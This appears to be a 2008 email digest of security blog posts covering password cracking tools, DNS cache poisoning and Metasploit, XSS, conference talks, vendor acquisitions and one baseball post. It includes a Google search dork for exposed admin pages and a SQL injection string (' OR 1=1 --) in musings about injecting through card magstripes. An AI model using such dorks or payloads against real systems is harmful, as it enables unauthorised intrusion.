Posted: 01 Aug 2008 08:41 AM CDT
Posted: 01 Aug 2008 05:26 AM CDT
SIPcrack is a suite for sniffing and cracking the digest authentication used in the SIP protocol. The tools offer support for pcap files, wordlists and many more to extract all needed information and bruteforce the passwords for the sniffed accounts. If you don’t have OpenSSL installed or encounter any building problems try ‘make...
Read the full post at darknet.org.uk
Posted: 01 Aug 2008 04:31 AM CDT
Another WiFi program: wsrtool.py This Python program allows you to process wsr files (capture files of the ISM spectrum, created by Chanalyzer with a Wi-Spy adapter).
You need to install the Python module Construct.
Here’s an unfiltered capture:
And here I used a band-pass filter with cutoff frequencies 2420 MHz and 2445 MHz:
Posted: 01 Aug 2008 01:36 AM CDT
So simply and non destructive!
Posted: 01 Aug 2008 12:55 AM CDT
As system administration has matured and information technology has come along over the past decade or so we've learned many things which appear to go in one ear and then out the other. Most of these deal with secure systems design, and basically how to keep from making yourself an easy target for hackers.
With that glowing in the back of my mind like a energy-saving lightbulb I went on a hunt for things that should not be available on the web.
First off, I think I've had this debate with people so many times it hurt my brain - but administrative interfaces to applications, appliances, or widgets simply shouldn't be available to the general web-based casual viewer. Worse yet, it should definitely *not* be index-able with a search engine.
With that in mind, I decided to give Google a chance to see how many people still allow open, administrator pages on the 'net. Granted, sometimes you just can't help this, right... but if I can index your admin page, and your authentication mechanism isn't well-built... it's only a matter of time before I pwn you. Check it out for yourself, go to Google, and use this search term "inurl:"admin" intext:administrator login" and see what you get. Scarry, huh? How many of these systems that you find do you think you can grind away at until you guess a password via brute-force?
Common boys and girls... you should *not* put an admin interface on the general net, that's what we have VPNs for, and management networks. *sigh*.
Posted: 31 Jul 2008 08:20 PM CDT
Posted: 31 Jul 2008 06:34 PM CDT
You can download the videos made during The Last HOPE from http://hopetracker.donthax.me/
Bittorrent is being used to re-distribute the content, so help us seed.
You will find the videos from subjects as:
Posted: 31 Jul 2008 05:05 PM CDT
SQL injection in web apps is sooooo old. It still exists everywhere and security companies are still making good moolah by capturing 'crown jewels' by exploiting this - However, I'm not sure that SQL injection testing for non web based applications/scenarios has caught on. Are they even worth trying ? For example: I'd really like to test the logic for the following (for starters) at some point in life :
1. Cell phones - EMEA registration. Attempt to SQL inject the backend during registration and/or normal communication. Ditto with normal phone lines - would that work ? Before I even say "Only one way to find out.." I should really read up on cell phones to test the theory..
2. Magstripes on cards - change data in the magstripe of ID cards , hotel access cards, credit cards, debit cards etc - to SQL inject the backend - Hmmm.. my name/cardnumber/PIN is now ' OR 1=1 -- ?
Something like little bobby tables.
3. Checks - Change the account number on checks to SQL inject the backend. I'm almost certain this would fail because of the MICR E13b restrictions of characters.. ah well..
Ah well..I would need to get back into security consulting at some point if I want to test this out in a legal way..
Posted: 31 Jul 2008 04:13 PM CDT
It may be the dog days of summer, but it is the height of the baseball season and the trade deadline just passed. Not without some blockbuster deals going down though. The biggest one is the a 3 team deal involving the Dodgers, Pirates and the Red Sox. The BoSox give up the heart and soul of their championship team, future hall of famer, Manny Ramirez. In exchange they get from the Pirates, Jason Bay. A few other players involved, but who cares. Does this mean the Sox are giving up on this season? As a Yankee fan I can't tell you how happy I am not to see Manny so many times a year. I also think Joe Torre will do a great job of managing Manny out in LA. Good luck to Manny. Though he killed us for years, I respected his talent.
Speaking of the Yankees, they have made a few moves for the pennant run. In addition to their own trade with the Pirates to get Xavier Nady and Damaso Marte, they pulled off a great deal yesterday getting Pudge Rodriguez to fill in as catcher for Jorge Posada. This could be a huge deal for the Yankees. They gave up Kyle Farnsworth, who while threw well this year, gave up home runs like candy. I am flying up to NY with my two sons tomorrow and will be at the Stadium tomorrow night to watch the Yanks play the Angels, who also made a big trade for the Braves Mark Teixeira.
Another future hall of famer, Ken Griffey, Jr was also traded to the White Sox today. Wow! What a day in baseball. I can't wait to sit in the temple that is Yankee Stadium with my two boys tomorrow. It is like a dream come true, similar to taking them to a Steeler game last year. With all of the action going on around baseball it is also a great time to do it.
Posted: 31 Jul 2008 03:55 PM CDT
Continuing the rapid consolidation or maybe the swallowing of the DLP market McAfee while announcing flat earnings today also announced that they were acquiring Reconnex for 46 million in cash. That just about does it in the DLP market with most of the pots having found a cover. Congrats to all of the folks at Reconnex!
Posted: 31 Jul 2008 03:33 PM CDT
For those interested, F-Secure is having another reverse engineering contest tomorrow.
(Photo under Creative Commons from pt's Photostream)
Posted: 31 Jul 2008 03:15 PM CDT
Been busy but I still wanted to post something quick.
If you didn't know, F-Secure's yearly reverse engineering challenge, Khallenge, is about to start. It works by using levels - you download a binary, figure out how to reverse it and get the password to the next level. I've done it in years past and have gotten to the last level but not beyond. Maybe I'll try this year. It starts August 1, 2008 at midnight (EEST) which should be about 5PM July 31, 2008 EST. It lasts only two days so get out there and reversing! http://www.khallenge.com/
There are many excellent blogs out there which have alot of great information on reverse engineering and malware analysis. However, I want to call out one which I consistently find excellent information on new threats and how to perform malware analysys: The Websense Security Labs Blog.
I'll be the first to admit that when I think of Websense I think of content filtering and not malware analysis. (Actually I think of some poor fool who has to visit every site that gets submitted to categorize it.) However, they have some really smart people working for them who do alot of great malware analysis work. They constantly publish excellent blog entries about different aspects of malware. This is one of the blogs which I will ensure I read whenever they publish something new. Their RSS feed is here and I highly recommend it.
Anyone have any good resources they'd like to mention?
Posted: 31 Jul 2008 02:30 PM CDT
Sophos intends to buy Utimaco. Until then, Sophos will resell SafeGuard Enterprise and they now have a mutual referral agreement for all products from both companies. Utimaco will become a new business unit focused on data security and the SafeGuard brand will be retained.
From the customer announcement email:
Posted: 31 Jul 2008 01:19 PM CDT
Posted: 31 Jul 2008 01:01 PM CDT
Loads of awesome looking presentations this year! So hard to choose from. I really hope I'll have time to see most of them and not stuck 24x7 in little rooms answering questions with people holding microphones. :) I hear the conference attendance is PACKED and suggest if you want to get in to see a popular speaker/talk, get there early. Oh, the same goes for the OWASP/WASC Party, get the Breach booth early.
Day 1: 10:00 to 11:00
Bad Sushi: Beating Phishers at Their Own Game
Nitesh Dhanjani, Senior Manager
Billy Rios, Microsoft
I saw this talk at Blue Hat is Seattle a couple months back. Not only is the data they present extremely compelling, but their humor and speaking style really put it over the top. With so many dry talks in our industry, when speakers are actively engaging it really makes a difference.
Day 1: 11:15 to 12:30
The vulnerability itself and disclosure drama aside, I have it on good authority that Dan will provide some important lessons learned as a result of the fiasco with regards to software serviceability. I'm really interested in hearing what he has to say about how we can improve our situation so we can adapt better to a similar scenario down the road.
Day 1: 13:45 to 15:00
Iron Chef: Fuzzing Challenge
This event was a lot of fun last year when I participated as a "celebrity judge". Just don't be under the impression that this is a scientific experiment or any kind. Instead simple enjoy the "show" where you can participate if you'd like. You get some code, find vulnerabilities however you want, and share your results. Simple! We should give them RSnake's blog software. :)
Day 1: 15:15 to 16:30
Xploiting Google Gadgets: Gmalware and Beyond
Day 1: 16:45 to 18:00
FLEX, AMF 3 and BlazeDS: An Assessment
Don't know much about the speakers or the talk itself, but the subject matter looks compelling and particularly timely. I've been doing a lot of my own research in Flash/Flex are well and there is a lot of unexplored territory within. XSS and CSRF malware payloads can and will get a lot worse with this stuff.
Day 2: 10:00 to 11:00
Encoded, Layered and Transcoded Syntax Attacks: Threading the Needle Past Web Application Security
Going only because I have to speak alongside Arian. :) This presentation is the result of a large amount of experimentation on live websites using seriously obfuscated attack techniques. Some of the methods we're still not exactly sure why they work, only that they do in extreme edge cases. What we're also learning is that there is A LOT of web application vulnerability edge cases out there.
Day 2: 11:15 to 12:30
No More Signatures: Defending Web Applications from 0-Day Attacks with ModProfiler Using Traffic Profiling
A serious toss up between this one and Threats to the 2008 Presidential Election, which I'm sure is also going to be a stellar. For me, I need to stay as up-to-date as I can in WAF technology evolution and Ivan is THE MAN in the open source space.
Day 2: 13:45 to 15:00
REST for the Wicked
Love the talk title and really interested in learning about any new attack techniques on SOAP and surrounding technologies. This area also continues to be a struggle for automated testing.
Day 2: 15:15 to 16:30
Get Rich or Die Trying – Making Money on the Web, the Black Hat Way
Again, only because I HAVE to be there. :) I've been wanting to do a presentation like this for quite some time and have finally been able to pull together enough data and public examples to make it possible. The idea is to demonstrate how to make serious money illicitly using the most simplistic of web attack techniques, all of which have already been used in the real world, and then speculate a little on other possibilities. All story driven, not meant to be grown breaking attack wise, just really thought provoking and fun.
Day 2: 16:45 to 18:00
Pushing the Camel Through the Eye of a Needle
Only because the Sensepost guys are super l33t, always have exceptional material, and I've never been to a bad presentation yet. Didn't even bother to read the description, I know it'll be worthwhile. Hopefully I can make it over there after my presentation.
Posted: 31 Jul 2008 12:50 PM CDT
The live stream should be active about 6:45 PM EDT, Thursday, July 31st. We should begin recording the live show at about 7:00 PM EDT. Please keep in mind that these times are all estimates, but we will try to do the best that we can.
Don't forget to join in on the IRC channel during the stream - we can take live comments and discussion from the channel! Find us on IRC at irc.freenode.net #pauldotcom.
When active, the live stream(s) can be found at:
Please join us, and thanks for listening!
- Larry & Paul
Posted: 31 Jul 2008 11:50 AM CDT
Information Researchers from the UCSB Department of Computer Science, (Marco Cova, Christopher Kruegel, and Giovanni Vigna) have released a paper (at this Monday’s USENIX conference in San Jose, CA, entitled “There is No Free Phish: An Analysis of ‘Free’ and Live Phishing Kits”, detailing the illicit backdoors in already illicit software. Whereby the already stolen data from the unsuspecting user,the victim of the phishing attack, is stolen once more, by the crimimals responsible for the kit publication! Once again, the old adage is relevant: “There is no honor amongst thieves”. You can download a PDF formatted copy of the paper from the Infosecurity.US Document Repository, or via USENIX.
Posted: 31 Jul 2008 09:00 AM CDT
July 31, 2008 - Volume 3, #66
Top Security News
Is there are "secure enough?"
Top Blog Postings
I'll take one defeat and despair to go...
Posted: 31 Jul 2008 08:41 AM CDT
Posted: 31 Jul 2008 08:35 AM CDT
Man, why didn't I think of this. I've seen video of people social engineering their way through many restricted areas in the past; some claiming to have forgotten something in the target locations, others claiming to be Jason Biggs from American Pie fame. None of them are quite as simple, and effective, as just claiming your the DJ! Watch as this man gets into every club he tries just by claiming he's the DJ and is spinning shortly. Watch to the end of the video to see some reasonably funny attempts at DJ social engineering in completely random places.
Learn how to hack at 5min.com
Posted: 31 Jul 2008 04:31 AM CDT
This is a pretty old issue, but this is an interesting new implementation of an old idea. Using your browser history and by matching your browsing habits the site attempts to guess your gender with a weighting system according to the gender demographics for a list of fairly popular sites. It’s not super accurate unless you [...] ShareThis
Read the full post at darknet.org.uk
Posted: 31 Jul 2008 02:14 AM CDT
This afternoon on my MacBook Pro, Mail and Safari were acting screwy. Safari would give me a beach ball when I tried to fill out a form on Amazon and Mail would give me a beach ball when it did an address look up when I typed someone’s name in the To: field. I tried to open Address Book, but it wouldn’t open, instead giving me a “not responding” status immediately in the Force Quit Applications window.
Not having the skills or time to really find out what was going on, I popped open Cocktail and repaired the disk permissions and left to run some errands. I came back 3 hours later, glanced at the Cocktail log and opened a new email. When I typed a name into the address field, it did the look up (I could see the spinner working) and then stopped, not having found the name. This time I was able to open Address Book to see that everything was gone. All my contacts. Thousands of them. Gone. I visited the MobileMe page, naturally, the contacts were gone there too. I then opened my iPhone to turn off syncing before it got wiped - too late. Since I didn’t find the problem before SuperDuper made my daily backup, it looks I have lost my most recent changes, but luckily nearly everything is saved in my Daylite database so this isn’t critical - just a huge pain in the ass.
I had been reading headlines about the MobileMe problems, but never suffered any until this afternoon. I was a .Mac customer before solely for the convenience of the iDisk to backup a small amount of critical data so Apple won’t lose any of my money, but I have turned off over-the-air sync and don’t plan to turn it on until 2010 or so. If my contacts got wiped from my phone while I was on the road I would be crippled. Nope, can’t take that chance.
Posted: 30 Jul 2008 09:24 PM CDT
In a recent blog post, I cited a study by researchers at the University of Michigan, saying 75% of banking web sites had design flaws, making them vulnerable to hackers.
In a recent article by Larry Seltzer of eWeek, he said the findings from the study, which came out in 2006, are outdated. He said the results were either not relevant any more -- such as insecure login pages not using https -- or not real threats -- non-https Contact Us pages.
He goes through the rest of the report point-by-point and makes some interesting points.
Posted: 30 Jul 2008 07:47 PM CDT
The Economic Times of India reports significant scrutiny is being applied (yet again) to RIM’s deployment of Blackberry devices to the general public, and the security measures to be taken. More headaches for RIM (NasdaqGS: RIMM), or can they comply with the recommendations of the Government of India Department of Telecommunications (DoT)?
Posted: 30 Jul 2008 07:15 PM CDT
It's summertime meaning that the first half of 2008 has passed. So time for papers to be released and for us to read them.
1. Stopbadware released a paper using data from Google's Safe Browsing initiative and found that 200,000 websites were engage in badware behavior. Now there is also a small update:
Note: A network block owner is not always the owner or operator of the infected servers on that block, and our publication of these data is intended to inform and educate, not to assign blame.(Source: Stopbadware.org)
As some people mentioned, most of in the infect servers appear to be located in China. The infection vector through websites has increased a lot compared to last year. (see: Drive-by downloads). Read the entire paper for some interesting insights.
2. Papers from WOOT '08 and HotSec '08
Two interesting workshops took place this week: 2nd USENIX Workshop on Offensive Technologies (WOOT '08) and 3rd USENIX Workshop on Hot Topics in Security (HotSec '08). Both of them produced some interesting documents! Some examples:
3. IBM X-Force released security statistics
4. Websense released mid year 2008 report
(Photo under Creative Commongs from Dhammza's Photostream)
Posted: 30 Jul 2008 07:03 PM CDT
I have seen a lot of reports on attacks on unpatched DNS Caching servers but with little or no (technical) information. A lot seems to be based on the email posted on the Fedora mailinglist by user James Kosin. (see Did the DNS attacks part 1)
The logs he provided were not signs of exploitation, but it was a indication of a scan for open resolving dns servers. An increase of DNS scanning has been reported by Arbor Networks in their "30 Days of DNS Attack Activity" post of the 28th of July.
Plotting UDP/53 attack activity (the thicker dark "pinkish red" line below) across Arbor's "anonymous statistics program" participants (~70 ISPs) illustrates an order of magnitude increase in UDP/53 and/or DNS events beginning around July 9, 2008. Note that while most of the data from the anonymous statistics program is based on Network and Transport layer attributes of traffic, there are specific DNS capabilities that exist in our Threat Management System (TMS) product that deal extensively with payloads as well. Given that this vulnerability was partially disclosed on July 8, I suspect a great deal of this traffic is name server vulnerability scanning, as opposed to malicious cache poisoning attempts, although there may well be a mix of the latter.So still no conclusive proof there. But if you look at the graphic from Arbornetworks, the increase in DNS scanning since the 8th of July is concerning. Also the small difference after the 13-day leak is an indication of some kind.
Now, the metasploit exploit needs a service to determine the source port used by the target name server. The 'check' command does just that. The exploit itself will also query the Metasploit service if you set SRCPORT to 0. So no information is sent to metasploit.com unless SRCPORT is manually set to '0' or the check command is run (non-standard for aux modules). (Source: HD Moore on the Full Disclosure mailinglist). For more information, check the entire post.
So, it's useful to know that in some case, the metasploit tool will report information back. Now let's look at this Twitter message from the 24th of July:
HD Moore: About 75% of the folks checking exploitability via metasploit module are vulnerable. (So this is telling us that people were testing this tool and most of the DNS servers they were tested on were vulnerable (24 June) . This is not a good sign of course. But it doesn't proof malicious activity. Until I saw the following message on Twitter:
UPDATE: As a result of the SBC/ATT DNS servers getting poisoned, HD Moore has added a module in Metasploit to compare the cache of two DNS servers. (/UPDATE)
Patching is in progress, but as Dan Kaminsky said. Patching is not the final solution. It only makes the exploit a lot harder. There is still a 1% change each hour to succeed in cache poisoning. There is a fierce discussion going on in the comments of the latest Bruce Schneier post: "The DNS Vulnerability". The article itself makes a good point that by having design security in the system in the first place, we wouldn't need the patch. I recommend to read it including the comments.
So again, advice for syadmins how can you detect this attack? Look for this kind of patterns in your logfiles:
Or you can have a look at research described in Jose Avila's Recursive DNS Cache Auditing presentation in addition to the ONZRA security research tool CacheAudit v.01, see the Research folder at ONZRA for the CacheAudit download. Scan for udp/tcp port 53 in your network and check and patch the servers asap. Even if they are internal servers.
Advice for endusers: use the DNS tool on the doxpara.com website or the webbased tool from DNS-OARC. If it appears, you are using an unsafe DNS server, switch to openDNS. Here are the instructions.
I'm also considering how this can affect hotspot users and similar mobile users in combination with tools like Evilgrade or Karmetasploit. Even without this DNS exploit, both toolkits used on untrusted LANs of WLANs can be dangerous. But that is for another post.
UPDATE: Zero Day just posted a similar article that additionally includes some interesting DNS Security Surveys from the past. Check it out.
UPDATE (30/07/2008): Brian Krebs from the Washington Post just wrote an article on Evilgrade and hotspots. It seems that iTunes and Mac OS updates were fixed in december '07. Read here for more info.
FINAL UPDATE (30/07/2008): HD Moore has put some more details in a post on Metasploit on what happened. The enemy has entered the gate now and is inside.
Posted: 30 Jul 2008 07:02 PM CDT
Rsnake joined twitter and did it with a bang. In about two hours, he found a XSS using a trusted domain of Twitter. Luckily, Twitter saw the tweet and it got fixed in about 90 minutes total. The crossdomain.xml has indeed been thoroughly revised. A chain is only as strong as it's weakest link.
Read this post from Ed Bellis for the details and the response from Twitter. A story with a happy end.
Robert "RSnake" Hansen is a webapplication specialist and one of the authors of the XSS book (XSS Attacks - Cross Site Scripting Attacks Exploits and Defense). You can download a zipped up version of Chapter 5 and the table of contents (free sample).
(Photo under Creative Commons from Darwin Bell's Photostream)
Posted: 30 Jul 2008 07:01 PM CDT
I was browsing through the Backtrack forums and noticed that Backtrack-fr opened up a webshop for Tshirts (French) a while back. It's based on the spreadshirt site and is based in Germany and can deliver almost all over Europe. The US version is in the making. I might buy one or two. So what about Backtrack 4?
While I was listening to the Pauldotcom podcast about Paul's experiments with the Asus Eee PC, they mentioned Backtrack 4 (Episode 114). He was replacing the Xandos Linux version with Ubuntu and used Backtrack only from a USB Thumb Drive. He wouldn't recommend installing it as the default OS, as Backtrack 3 is really made as a live distribution.
He then mentioned that Backtrack 4 would be more built as a complete distribution in comparison to the previous versions. This can only mean more flexibility and more pwnage. I will be looking forward to it!!
|You are subscribed to email updates from Black Hat Security Bloggers Network |
To stop receiving these emails, you may unsubscribe now.
|Email Delivery powered by FeedBurner|
|Inbox too full? Subscribe to the feed version of Black Hat Security Bloggers Network in a feed reader.|
|If you prefer to unsubscribe via postal mail, write to: Black Hat Security Bloggers Network, c/o FeedBurner, 20 W Kinzie, 9th Floor, Chicago IL USA 60610|